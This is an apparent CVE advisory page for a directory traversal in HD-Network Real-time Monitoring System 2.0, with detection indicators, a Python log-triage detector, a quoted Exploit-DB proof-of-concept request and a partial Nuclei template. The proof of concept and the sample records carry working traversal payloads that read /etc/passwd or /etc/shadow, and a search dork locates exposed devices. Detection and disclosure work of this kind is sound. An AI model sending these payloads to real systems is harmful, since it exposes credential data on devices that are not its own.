CVE-2021-45043
Published 2021-12-15
CVE-2021-45043: HD-Network Real-time Monitoring System 2.0 allows ../ directory traversal to read /etc/shadow via the /language/lang s_Language parameter.
Priority: P266 (high)
CVSS 3.1: 7.5, AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EXPLOIT
EPSS: 33.13% (98.2th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hd-network_real-time_monitoring_system_project | hd-network_real-time_monitoring_system | — | — |
Detection & IOCs (extracted from sources)
- Exploit targets the `s_Language` cookie parameter with directory traversal sequences (../../) to read sensitive files such as /etc/passwd or /etc/shadow. Monitor HTTP requests to /language/lang with cookie values containing '../' sequences.
- Successful exploitation returns HTTP 200 with content matching 'root:.*:0:0:' in the response body, indicating /etc/passwd file disclosure.
- Identify exposed instances via Shodan or Google using the title fingerprint 'HD-Network Real-time Monitoring System V2.0'.
- The vulnerability is exploitable by unauthenticated remote attackers — no session or credentials are required. Any request to /language/lang with a traversal payload in the s_Language cookie should be treated as an active exploitation attempt.
- The traversal payload depth in the s_Language cookie uses an excessive number of '../' sequences (15+), suggesting the application does not normalize or limit path traversal depth. Detection rules should match on any occurrence of '../' in the s_Language cookie, not just the exact depth shown in the PoC.
- The NVD description references /etc/shadow as the target file, while the PoC uses /etc/passwd. Both sensitive files are reachable; detection and alerting should cover both targets.
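The request and response indicators listed above, combined into one log-triage check. This is an added example, not part of the advisory or its sources: the record schema (path, cookie, status, body) and the sample records are constructed, and the percent-decoding step is a defensive generalization beyond the literal '../' match the page describes.

```python
import re
from urllib.parse import unquote

TARGET_PATH = "/language/lang"             # endpoint named on the page
COOKIE_NAME = "s_Language"                 # cookie parameter named on the page
TRAVERSAL = re.compile(r"\.\./")           # any depth, not only the PoC's
PASSWD_LEAK = re.compile(r"root:.*:0:0:")  # response marker quoted on the page

def cookie_value(cookie_header, name):
    """Return the first value of `name` in a Cookie header, or ''."""
    for part in cookie_header.split(";"):
        key, sep, value = part.strip().partition("=")
        if sep and key == name:
            return value
    return ""

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so an encoded '../' is compared in plain form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(event):
    """Return 'disclosure', 'attempt' or None for one request/response record."""
    if event["path"].split("?", 1)[0].rstrip("/") != TARGET_PATH:
        return None
    lang = decode_fully(cookie_value(event.get("cookie", ""), COOKIE_NAME))
    if not TRAVERSAL.search(lang):
        return None
    if event.get("status") == 200 and PASSWD_LEAK.search(event.get("body", "")):
        return "disclosure"   # traversal request answered with passwd-style content
    return "attempt"          # traversal seen, no confirmed file content

# Constructed sample records (hypothetical schema, not real traffic).
SAMPLES = [
    {"path": "/language/lang", "cookie": "s_Language=english; s_browsertype=2", "status": 200, "body": "{}"},
    {"path": "/language/lang", "cookie": "s_Language=../../etc/passwd", "status": 404, "body": ""},
    {"path": "/language/lang", "cookie": "s_ip=; s_Language=%2e%2e%2fetc%2fshadow", "status": 200, "body": ""},
    {"path": "/language/lang", "cookie": "s_Language=../../../etc/passwd", "status": 200,
     "body": "root:x:0:0:root:/root:/bin/sh\n"},
    {"path": "/index.html", "cookie": "s_Language=../../etc/passwd", "status": 200, "body": ""},
]

if __name__ == "__main__":
    for ev in SAMPLES:
        print(classify(ev), ev["cookie"])
```

A /etc/shadow read will not match the 'root:.*:0:0:' response marker, so an "attempt" verdict with HTTP 200 still needs manual review of the response.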
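CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |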
No detection rules found.
Exploit-DB
HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)
exploitdb·2021-12-13
---
```
# Exploit Title: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)
# Google Dork: intitle:"HD-Network Real-time Monitoring System V2.0"
# Date: 11/12/2021
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: N/A
# Version: V2.0
# Tested on: Nginx NVRDVRIPC Web Server

Proof of Concept:

GET /language/lang HTTP/1.1
Referer: http://example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=;
```
Nuclei
HD-Network Realtime Monitoring System 2.0 - Local File Inclusion
nuclei·CVSS 7.5
Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information.
Template:
```yaml
id: CVE-2021-45043

info:
  name: HD-Network Realtime Monitoring System 2.0 - Local File Inclusion
  author: Momen Eldawakhly,Evan Rubinstein
  severity: high
  description: Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored o
```
- https://drive.google.com/file/d/1DlfZz0F8skWy3Mkahx_NMo-sYZh9-eun/view?usp=sharing
- https://drive.google.com/file/d/1bx9yCN-IHYuRpd7g3jhMb0LcTC1ARzSX/view?usp=sharing